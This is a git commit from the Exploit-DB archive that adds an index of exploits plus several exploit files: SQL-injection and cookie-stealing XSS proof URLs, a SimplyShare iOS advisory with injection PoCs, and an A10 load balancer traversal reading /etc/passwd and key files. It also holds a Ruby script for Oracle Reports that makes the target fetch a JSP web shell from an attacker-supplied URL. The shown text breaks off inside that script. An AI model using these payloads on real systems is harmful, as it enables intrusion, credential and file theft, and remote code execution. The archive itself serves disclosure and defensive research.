From 3df1ce2164ac4e2aee31b370e74c4a4743e5b886 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 31 Jan 2014 04:26:59 +0000
Subject: [PATCH] Updated 01_31_2014

---
 files.csv                            |  29 +-
 platforms/asp/webapps/31275.txt      |  10 +
 platforms/asp/webapps/31276.txt      |   9 +
 platforms/asp/webapps/31286.txt      |   7 +
 platforms/hardware/webapps/31258.txt | 384 +++++++++++++++++++++++++++
 platforms/hardware/webapps/31261.txt |  68 +++++
 platforms/jsp/remote/31253.rb        | 128 +++++++++
 platforms/multiple/remote/31279.txt  |   9 +
 platforms/php/remote/31264.rb        | 149 +++++++++++
 platforms/php/webapps/31262.txt      |  62 +++++
 platforms/php/webapps/31263.txt      | 223 ++++++++++++++++
 platforms/php/webapps/31265.txt      |   9 +
 platforms/php/webapps/31266.txt      |   9 +
 platforms/php/webapps/31267.txt      |   9 +
 platforms/php/webapps/31268.txt      |   9 +
 platforms/php/webapps/31269.txt      |  10 +
 platforms/php/webapps/31270.txt      |  10 +
 platforms/php/webapps/31272.txt      |   7 +
 platforms/php/webapps/31273.txt      |   7 +
 platforms/php/webapps/31274.txt      |   7 +
 platforms/php/webapps/31277.txt      |   9 +
 platforms/php/webapps/31278.txt      |   9 +
 platforms/php/webapps/31280.txt      |   8 +
 platforms/php/webapps/31281.txt      |   7 +
 platforms/php/webapps/31282.txt      |   9 +
 platforms/php/webapps/31283.txt      |   9 +
 platforms/php/webapps/31284.txt      |   7 +
 platforms/php/webapps/31287.txt      |   9 +
 28 files changed, 1221 insertions(+), 1 deletion(-)
 create mode 100755 platforms/asp/webapps/31275.txt
 create mode 100755 platforms/asp/webapps/31276.txt
 create mode 100755 platforms/asp/webapps/31286.txt
 create mode 100755 platforms/hardware/webapps/31258.txt
 create mode 100755 platforms/hardware/webapps/31261.txt
 create mode 100755 platforms/jsp/remote/31253.rb
 create mode 100755 platforms/multiple/remote/31279.txt
 create mode 100755 platforms/php/remote/31264.rb
 create mode 100755 platforms/php/webapps/31262.txt
 create mode 100755 platforms/php/webapps/31263.txt
 create mode 100755 platforms/php/webapps/31265.txt
 create mode 100755 platforms/php/webapps/31266.txt
 create mode 100755 platforms/php/webapps/31267.txt
 create mode 100755 platforms/php/webapps/31268.txt
 create mode 100755 platforms/php/webapps/31269.txt
 create mode 100755 platforms/php/webapps/31270.txt
 create mode 100755 platforms/php/webapps/31272.txt
 create mode 100755 platforms/php/webapps/31273.txt
 create mode 100755 platforms/php/webapps/31274.txt
 create mode 100755 platforms/php/webapps/31277.txt
 create mode 100755 platforms/php/webapps/31278.txt
 create mode 100755 platforms/php/webapps/31280.txt
 create mode 100755 platforms/php/webapps/31281.txt
 create mode 100755 platforms/php/webapps/31282.txt
 create mode 100755 platforms/php/webapps/31283.txt
 create mode 100755 platforms/php/webapps/31284.txt
 create mode 100755 platforms/php/webapps/31287.txt

diff --git a/files.csv b/files.csv
index db1bbe2b6..62a7b5d5f 100755
--- a/files.csv
+++ b/files.csv
@@ -27304,7 +27304,7 @@ id,file,description,date,author,platform,type,port
 30440,platforms/cgi/webapps/30440.txt,"WebEvent <= 4.03 Webevent.CGI Cross-Site Scripting Vulnerability",2007-07-31,d3hydr8,cgi,webapps,0
 30441,platforms/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 Buffer Overflow Vulnerability",2007-07-31,"Code Audit Labs",windows,remote,0
 30442,platforms/php/webapps/30442.txt,"WebDirector Index.PHP Cross Site Scripting Vulnerability",2007-08-01,r0t,php,webapps,0
-30443,platforms/php/webapps/30443.txt,"Wordpress Persuasion Theme - Arbitrary File Download and File Deletion Exploit",2013-12-23,"Interference Security",php,webapps,80
+30443,platforms/php/webapps/30443.txt,"Wordpress Persuasion Theme 2.x - Arbitrary File Download and File Deletion Exploit",2013-12-23,"Interference Security",php,webapps,80
 30444,platforms/linux/dos/30444.txt,"KDE Konqueror <= 3.5.7 Assert Denial of Service Vulnerability",2007-03-05,"Thomas Waldegger",linux,dos,0
 30445,platforms/php/webapps/30445.txt,"Joomla Tour de France Pool 1.0.1 Module mosConfig_absolute_path Remote File Include Vulnerability",2007-08-02,Yollubunlar.Org,php,webapps,0
 30446,platforms/asp/webapps/30446.txt,"Hunkaray Okul Portali 1.1 Duyuruoku.ASP SQL Injection Vulnerability",2007-08-02,Yollubunlar.Org,asp,webapps,0
@@ -28067,3 +28067,30 @@ id,file,description,date,author,platform,type,port
 31250,platforms/php/webapps/31250.txt,"XOOPS 'seminars' Module 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
 31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
 31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module 'cid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
+31253,platforms/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Remote Exploit",2014-01-29,Mekanismen,jsp,remote,80
+31258,platforms/hardware/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,hardware,webapps,0
+31261,platforms/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,hardware,webapps,443
+31262,platforms/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80
+31263,platforms/php/webapps/31263.txt,"pfSense 2.1 build 20130911-1816 - Directory Traversal",2014-01-29,@u0x,php,webapps,0
+31264,platforms/php/remote/31264.rb,"Simple E-Document Arbitrary File Upload",2014-01-29,metasploit,php,remote,80
+31265,platforms/php/webapps/31265.txt,"Spyce 2.1.3 docs/examples/redirect.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0
+31266,platforms/php/webapps/31266.txt,"Spyce 2.1.3 docs/examples/handlervalidate.spy x Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0
+31267,platforms/php/webapps/31267.txt,"Spyce 2.1.3 spyce/examples/request.spy name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0
+31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 spyce/examples/getpost.spy Name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0
+31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 spyce/examples/formtag.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0
+31270,platforms/php/webapps/31270.txt,"Spyce 2.1.3 spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps,0
+31272,platforms/php/webapps/31272.txt,"Joomla! and Mambo 'com_joomlavvz' Component 'id' Parameter SQL Injection Vulnerability",2008-02-20,S@BUN,php,webapps,0
+31273,platforms/php/webapps/31273.txt,"Joomla! and Mambo 'com_most' Component 'secid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
+31274,platforms/php/webapps/31274.txt,"Joomla! and Mambo 'com_asortyment' Component 'katid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
+31275,platforms/asp/webapps/31275.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 Comments.asp FC Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0
+31276,platforms/asp/webapps/31276.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 Labels.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0
+31277,platforms/php/webapps/31277.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 ClassList.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0
+31278,platforms/php/webapps/31278.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 GradebookStuScores.asp GrdBk Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0
+31279,platforms/multiple/remote/31279.txt,"IBM Lotus Quickr QuickPlace Server 8.0 Calendar 'Count' Parameter Cross-Site Scripting Vulnerability",2008-02-21,"Nir Goldshlager AVNE",multiple,remote,0
+31280,platforms/php/webapps/31280.txt,"Joomla! and Mambo Referenzen Component 'id' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
+31281,platforms/php/webapps/31281.txt,"PHP-Nuke Classifieds Module 'Details' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
+31282,platforms/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 'print' Option SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
+31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module 'sid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
+31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module 'cid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
+31286,platforms/asp/webapps/31286.txt,"Citrix MetaFrame Web Manager 'login.asp' Cross-Site Scripting Vulnerability",2008-02-22,Handrix,asp,webapps,0
+31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 'recipeid' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0
diff --git a/platforms/asp/webapps/31275.txt b/platforms/asp/webapps/31275.txt
new file mode 100755
index 000000000..9d1a2aa86
--- /dev/null
+++ b/platforms/asp/webapps/31275.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27924/info
+
+Aeries Student Information System is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect Aeries Student Information System 3.8.2.8 and 3.7.2.2; other versions may also be affected. 
+
+
+http://www.example.com/Comments.asp?&FC=SQL
\ No newline at end of file
diff --git a/platforms/asp/webapps/31276.txt b/platforms/asp/webapps/31276.txt
new file mode 100755
index 000000000..bb0d5d557
--- /dev/null
+++ b/platforms/asp/webapps/31276.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27924/info
+ 
+Aeries Student Information System is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue, because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+These issues affect Aeries Student Information System 3.8.2.8 and 3.7.2.2; other versions may also be affected.
+ 
+http://www.example.com/Labels.asp?&Term=SQL
\ No newline at end of file
diff --git a/platforms/asp/webapps/31286.txt b/platforms/asp/webapps/31286.txt
new file mode 100755
index 000000000..8ad207f28
--- /dev/null
+++ b/platforms/asp/webapps/31286.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27948/info
+
+Citrix MetaFrame Web Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/Citrix/MetaFrameXP/default/login.asp?NFuse_LogoutId=Off&NFuse_MessageType=warning&NFuse_Message=%3Cscript%3Ealert(document.cookie);%3C/script%3E 
\ No newline at end of file
diff --git a/platforms/hardware/webapps/31258.txt b/platforms/hardware/webapps/31258.txt
new file mode 100755
index 000000000..08e573846
--- /dev/null
+++ b/platforms/hardware/webapps/31258.txt
@@ -0,0 +1,384 @@
+Document Title:
+===============
+SimplyShare v1.4 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1181
+
+
+Release Date:
+=============
+2014-01-28
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1181
+
+
+Common Vulnerability Scoring System:
+====================================
+9.2
+
+
+Product & Service Introduction:
+===============================
+SimplyShare is the ultimate tool to Transfer your Photos, Videos and Files easily to other iPhone/iPod Touch/iPad 
+and computers wirelessly (without any iTunes Sync). Download or upload photos/videos/files directly from a computer.
+Store, manage and view MS Office, iWork, PDF files and many more features
+
+Share Files, Photos or Videos:
+- Transfer any number of files, photos or videos with any size to other iOS devices (iPhone, iPod Touch and iPad) via Wi-Fi
+- Download files, photos or videos with any size to your computer via Wi-Fi
+- Upload multiple files, photos or videos with any size from your computer to your device via WiFi
+- Transfer your files via USB cable (iTunes sync)
+- View all your photo albums, videos and files on your device from a computer
+- Preserves all photos metadata after transfer
+- Slideshow all the photos of an album on a computer (on web browser)
+- Display your photos on other iOS devices without transfer/saving them
+- Send a short/quick text message from your computer or other iOS devices to your own iDevice
+- Email files or photos from your device
+
+Download Files from Internet:
+- Download files browsing the Internet
+- Tap & Hold on any link or photos to save them in SimpyShare app
+- Any webpage you visit, SimplyShare automatically generates all the links to supported files (MS Office, 
+iWork, PDF documents etc). Then you can download them by just a single tap.
+- Download images automatically by simply tapping on any image in the webpage
+
+File Manager:
+- Open or Print Microsoft Office documents (Office ‘97 and newer)
+- Open or Print iWork documents
+- View or Print PDF files, Images, RTF documents, CSV, HTML and Text files
+- Play Audio and Video files
+- Move, Copy delete files/folder or create new folders
+- Save images or videos to Photos Album
+- Ability to create folders and organize the files within the folders
+- iTunes USB sharing ...
+
+( Copy of the Homepage: https://itunes.apple.com/en/app/simply-share/id399197227 ) 
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official SimplyShare v1.4 iOS mobile application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2013-01-28:    Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Apple AppStore
+Product: Rambax, LLC - SimplyShare 1.4
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Critical
+
+
+Technical Details & Description:
+================================
+1.1
+A critical remote code execution web vulnerability has been discovered in the official SimplyShare v1.4 iOS mobile web-application.
+Remote attackers are able to execute own system specific codes to compromise the affected web-application or the connected mobile device.
+
+The remote vulnerability is located in the vulnerable `text` value of the `Send Text` module. Remote attackers can use the prompt send 
+text input to direct execute system codes or malicious application requests. The send text input field has no restrictions or secure 
+encoding to ensure direct code executes are prevented. After the inject the code execution occurs directly in the send text module 
+item list. The security risk of the remote code execution vulnerability is estimated as critical with a cvss (common vulnerability 
+scoring system) count of 9.2(+)|(-)9.3.
+
+Exploitation of the code execution vulnerability requires no user interaction or privileged web-application user account with password. 
+Successful exploitation of the remote code execution vulnerability results in mobile application or connected device component compromise.
+
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Module(s):
+				[+] Send Text
+
+Vulnerable Parameter(s):
+				[+] text
+
+Affected Module(s):
+				[+] Access from Computer (Send Text Index List - Text Name & Context)
+
+
+
+1.2
+A local file/path include web vulnerability has been discovered in the official SimplyShare v1.4 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system 
+specific path commands to compromise the web-application or mobile device.
+
+The local file include web vulnerability is located in the vulnerable `filename` value of the `upload files` module (web-interface).
+Remote attackers are able to inject own files with malicious filename to compromise the mobile application. The attack vector is 
+persistent and the request method is POST. The local file/path include execute occcurs in the main file to path section after the 
+refresh of the file upload. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common 
+vulnerability scoring system) count of 7.7(+)|(-)7.8.
+
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. 
+Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized 
+local file include web attacks.
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Input(s):
+				[+] Upload Files
+
+Vulnerable Parameter(s):
+				[+] filename
+
+Affected Module(s):
+				[+] Access from Computer (File Dir Index List - Folder/Category to  path=/)
+
+
+
+1.3
+A local command/path injection web vulnerability has been discovered in the official SimplyShare v1.4 iOS mobile web-application.
+The vulnerability allows to inject local commands via vulnerable system values to compromise the apple iOS mobile web-application.
+
+The vulnerability is located in the in the title value of the header area. Local attackers are able to inject own script codes 
+as iOS device name. The execute of the injected script code occurs with persistent attack vector in the header section of the 
+web interface. The security risk of the command/path inject vulnerabilities are estimated as high with a cvss (common vulnerability 
+scoring system) count of 6.2(+)|(-)6.3.
+
+Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access 
+and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific 
+commands or unauthorized path requests.
+
+Request Method(s):
+				[+] [GET]
+
+Vulnerable Value(s):
+				[+] devicename 
+
+Vulnerable Parameter(s):
+				[+] value to title
+
+Affected Module(s):
+				[+] Access from Computer (File Dir Index List) - [Header]
+
+
+
+
+1.4
+Multiple persistent input validation web vulnerabilities has been discovered in the official SimplyShare v1.4 iOS mobile web-application.
+The bug allows remote attackers to implement/inject own malicious persistent script codes to the application-side of the vulnerable app.
+
+The vulnerability is located in the `name` value of the internal photo and video module. The vulnerability can be exploited by manipulation 
+of the local device album names. After the local attacker with physical access injected the code to the local device foto app menu, he is able 
+to execute the persistent script codes on the application-side of the mobile app device. The security risk of the persistent script code inject 
+web vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.8(+)|(-)3.9.
+
+Exploitation of the persistent web vulnerabilities requires low user interaction and no privileged web-application user account with a password. 
+Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, 
+persistent phishing or persistent manipulation of module context.
+
+
+Vulnerable Module(s):
+				[+] Video Folder Name
+				[+] Photos Folder Name
+
+Vulnerable Parameter(s):
+				[+] album name values
+
+Affected Module(s):
+				[+] Access from Computer (Photos & Videos Module)
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The remote code execution vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account.
+For security demonstration or to reproduce the remote code execution vulnerability follow the provided steps and information below.
+
+PoC: Send Text
+
+<table class="ui-widget ui-widget-content" style="margin-bottom: 0;"> 
+				<thead> 
+					<tr class="ui-widget-header"> 
+						<th></th>
+						<th>Name</th> 
+						<th>Date</th> 
+						<th>Size</th> 
+					</tr> 
+				</thead> 
+				<tbody>
+<tr class="ui-state-default">
+<td></td><td colspan="3" class="name"><span class="ui-icon ui-icon-folder-collapsed"></span><a href="/?path=/">..</a></td>
+</tr>
+<tr class="ui-state-default">
+<td><input value="/Texts/>" type="checkbox">"<<>"<">[REMOTE CODE EXECUTION VULNERABILITY!] s="" 137.txt"="" 
+filesize="550"></td><td class="name"><span class="ui-icon ui-icon-document"></span>
+<a href="/Texts/>">"<<>"<"><[REMOTE CODE EXECUTION VULNERABILITY!] 137.txt</a></td><td>Jan. 23, 2014 14:07</td><td>0.5 KB</td></tr>
+
+
+--- PoC Session Logs [GET] ---
+14:13:14.499[93ms][total 1294ms] Status: 200[OK]
+GET http://192.168.2.109/?path=/Texts Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[6608] Mime Type[application/x-unknown-content-type]
+   Request Headers:
+      Host[192.168.2.109]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[http://192.168.2.109/]
+      Connection[keep-alive]
+      Cache-Control[max-age=0]
+   Response Headers:
+      Accept-Ranges[bytes]
+      Content-Length[6608]
+      Date[Do., 23 Jan. 2014 13:20:09 GMT]
+
+
+14:13:14.612[33ms][total 33ms] Status: 200[OK]
+GET http://192.168.2.109/rambax/server/jquery-ui-1.8.5.custom.css Load Flags[VALIDATE_ALWAYS ] Content Size[22041] Mime Type[text/css]
+   Request Headers:
+      Host[192.168.2.109]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
+      Accept[text/css,*/*;q=0.1]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[http://192.168.2.109/?path=/Texts]
+      Connection[keep-alive]
+      Cache-Control[max-age=0]
+   Response Headers:
+      Accept-Ranges[bytes]
+      Content-Length[22041]
+      Content-Type[text/css]
+      Date[Do., 23 Jan. 2014 13:20:09 GMT]
+
+
+
+1.2
+The file include web vulnerability can be exploited by remote attackers without user interaction and privileged web-application user account.
+For security demonstration or to reproduce the file/path include web vulnerability follow the provided steps and information below.
+
+PoC: Upload Files - Filename
+
+<tr class="ui-state-default">
+<td><input value="/Documents/[FILE INCLUDE VULNERABILITY VIA FILENAME]" filesize="723" type="checkbox"></td>
+<td class="name"><span class="ui-icon ui-icon-document"></span>
+<a href="/Documents/[FILE INCLUDE VULNERABILITY VIA FILENAME]">[FILE INCLUDE VULNERABILITY VIA FILENAME]</a></td>
+<td>Jan. 23, 2014 14:04</td><td>0.7 KB</td></tr>
+
+
+1.3
+The local command inject web vulnerability can be exploited by remote attackers without user interaction and privileged web-application user account.
+Physical device access or resource access is required to exploit the local command inject vulnerability. For security demonstration or to reproduce 
+the local command inject vulnerability follow the provided steps and information below.
+
+
+PoC: Title - Header
+
+	<body>
+		<div class="visible-div">
+			<img src="/rambax/server/SimplyShare-icon.png">
+			<div id="title">bkm¥337[LOCAL COMMAND INJECT VULNERABILITY VIA DEVICE NAME VALUE]</div>
+			<div id="header-links">
+
+1.4
+The persistent input validation web vulnerabilities can be exploited by remote attackers without privileged application user account but with 
+low or medium user interaction. For security demonstration or to reproduce the persistent vulnerabilities follow the provided steps and information below.
+
+PoC: Albums > name 
+
+<div id="albums">
+<ul class="column">
+<li><div class="block"><a href="/rambax/album/0-x" 
+title="Camera Roll (137)"><img src="/rambax/album_poster/0.jpg" class="photo"></a><span>Camera Roll (137)</span></div></li>
+<li><div class="block">
+<a href="/rambax/album/1" title="bkm"><[PERSISTENT INJECTED SCRIPT CODE!]"> (1)"><img src="/rambax/album_poster/1.jpg" 
+class="photo"/></a><span>bkm"><[PERSISTENT INJECTED SCRIPT CODE!]> (1)</span></div></li>
+			</ul>
+		</div>
+
+
+Solution - Fix & Patch:
+=======================
+1.1
+The first vulnerability can be patched by a secure restriction and encode of the send text input field with the text value parameter.
+Ensure the output send text item list module only displays secure parsed, encoded and validated context.
+
+1.2
+The second vulnerability can be patched by a secure parse and encode of the file name value parameter in the Upload File POST method request.
+
+1.3
+The third vulnerability can be patched by encoding the header section with the title value parameter to prevent physical command injection attacks.
+
+1.4
+Encode the photo album and video names to prevent persistent script code injection attacks by local stored album components of the foto (photo) app.
+
+
+Security Risk:
+==============
+1.1
+The security risk of the remote code exection vulnerability is estimated as critical.
+
+1.2
+The security risk of the local file include web vulnerability is estimated as high(+).
+
+1.3
+The security risk of the local command inject web vulnerability is estimated as high(-).
+
+1.4
+The security risk of the persistent script code inject web vulnerabilities via POST method request are estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
+or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
+Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
+modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/hardware/webapps/31261.txt b/platforms/hardware/webapps/31261.txt
new file mode 100755
index 000000000..4eec0dd92
--- /dev/null
+++ b/platforms/hardware/webapps/31261.txt
@@ -0,0 +1,68 @@
+-----------
+Author:
+-----------
+
+xistence < xistence[at]0x90[.]nl >
+
+-------------------------
+Affected products:
+-------------------------
+
+A10 Networks Loadbalancer (Soft)AX <=2.6.1-GR1-P5 & <=2.7.0 build 217
+
+-------------------------
+Affected vendors:
+-------------------------
+
+A10Networks
+http://www.a10networks.com/
+
+-------------------------
+Product description:
+-------------------------
+
+SupportCenter Plus is a web-based customer support software that lets
+organizations effectively manage customer tickets,
+their account & contact information, the service contracts and in the
+process providing a superior customer experience.
+
+----------
+Details:
+----------
+
+[ 0x01 - Directory Traversal ]
+
+A10 Networks (Soft)AX <=2.6.1-GR1-P5 & <=2.7.0 build 217 is prone to an
+unauthenticated directory traversal vulnerability.
+It's possible to download any file on the remote AX device with root
+privileges, without the need to authenticate to the website.
+
+The bug was fixed earlier in A10 Tracking ID "82150" according to the
+release notes, however the fix is not sufficient and can be bypassed.
+
+The new protection seems to make sure files are under the /a10data/tmp dir
+(https://<IP>/xml/downloads/?filename=/a10data/tmp/).
+
+By sending a GET request to
+"https://<IP>/xml/downloads/?filename=/a10data/tmp/../.."
+and thus keeping /a10data/tmp, we can bypass this. So if we would like
+to download the file /etc/shadow we send a GET request to "https://
+<IP>/xml/downloads/?filename=/a10data/tmp/../../etc/passwd".
+
+Or if we would like to download a certificate key file: "https://
+<IP>/xml/downloads/?filename=/a10data/tmp/../../a10data/key/domain.com"
+
+WARNING: Downloading a file will delete it from the AX device!
+
+
+-----------
+Solution:
+-----------
+
+Upgrade to a newer version.
+
+--------------
+Timeline:
+--------------
+
+Fixed somewhere back in 2013 :)
\ No newline at end of file
diff --git a/platforms/jsp/remote/31253.rb b/platforms/jsp/remote/31253.rb
new file mode 100755
index 000000000..604063768
--- /dev/null
+++ b/platforms/jsp/remote/31253.rb
@@ -0,0 +1,128 @@
+#!/usr/bin/env ruby
+
+# Exploit Title: Oracle Reports 11.1
+# About: Automated exploit for CVE-2012-3153/CVE-2012-3152
+# Google Dork: inurl:/reports/rwservlet/
+# Date: 01/28/2014
+# Exploit Author: Mekanismen <mattias@gotroot.eu>
+# Credits to: @miss_sudo for initial disclosure
+# Reference: http://netinfiltration.com/
+# Vendor Homepage: http://www.oracle.com/
+# Version: 11.1
+# Tested on: Linux
+# CVE-2012-3153
+# CVE-2012-3152
+
+require 'uri'
+require 'open-uri'
+require 'openssl'
+#OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE
+
+def upload_payload(dest)
+  url = "#{@url}/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/#{dest}/images/#{@payload_name}+JOBTYPE=rwurl+URLPARAMETER='#{@payload_url}'"
+  #print url 
+  begin
+  uri = URI.parse(url)
+  html = uri.open.read
+  rescue
+    html = ""
+  end
+  
+  if html =~ /Successfully run/
+    @hacked = true
+    print "[+] Payload uploaded!\n"
+  else
+    print "[-] Payload uploaded failed\n"
+  end
+end
+
+def getenv(server, authid)
+  print "[+] Found server: #{server}\n"
+  print "[+] Found credentials: #{authid}\n"
+  print "[*] Querying showenv ... \n"
+  begin
+    uri = URI.parse("#{@url}/reports/rwservlet/showenv?server=#{server}&authid=#{authid}")
+    html = uri.open.read
+  rescue
+    html = ""
+  end
+
+  if html =~ /\/(.*)\/showenv/ 
+    print "[+] Query succeeded, uploading payload ... \n"
+    upload_payload($1)
+  else
+    print "[-] Query failed... \n"
+  end
+end
+
+@payload_url = ""         #the url that holds our payload (we can execute .jsp on the server)
+@url = ""                 #url to compromise
+@hacked = false
+@payload_name = (0...8).map { ('a'..'z').to_a[rand(26)] }.join + ".jsp" 
+
+print "[*] PWNACLE Fusion - Mekanismen <mattias@gotroot.eu>\n"
+print "[*] Automated exploit for CVE-2012-3152 / CVE-2012-3153\n"
+print "[*] Credits to: @miss_sudo\n"
+
+unless ARGV[0] and ARGV[1]
+  print "[-] Usage: ./pwnacle.rb target_url payload_url\n"
+  exit
+end
+
+@url =  ARGV[0]
+@payload_url =  ARGV[1]
+print "[*] Target URL: #{@url}\n"
+print "[*] Payload URL: #{@payload_url}\n"
+print "[*] Payload name: #{@payload_name}\n"
+
+begin
+#Can we view keymaps?
+uri = URI.parse("#{@url}/reports/rwservlet/showmap")
+html = uri.open.read
+rescue
+  print "[-] URL not vulnerable or unreachable\n"
+  exit
+end
+
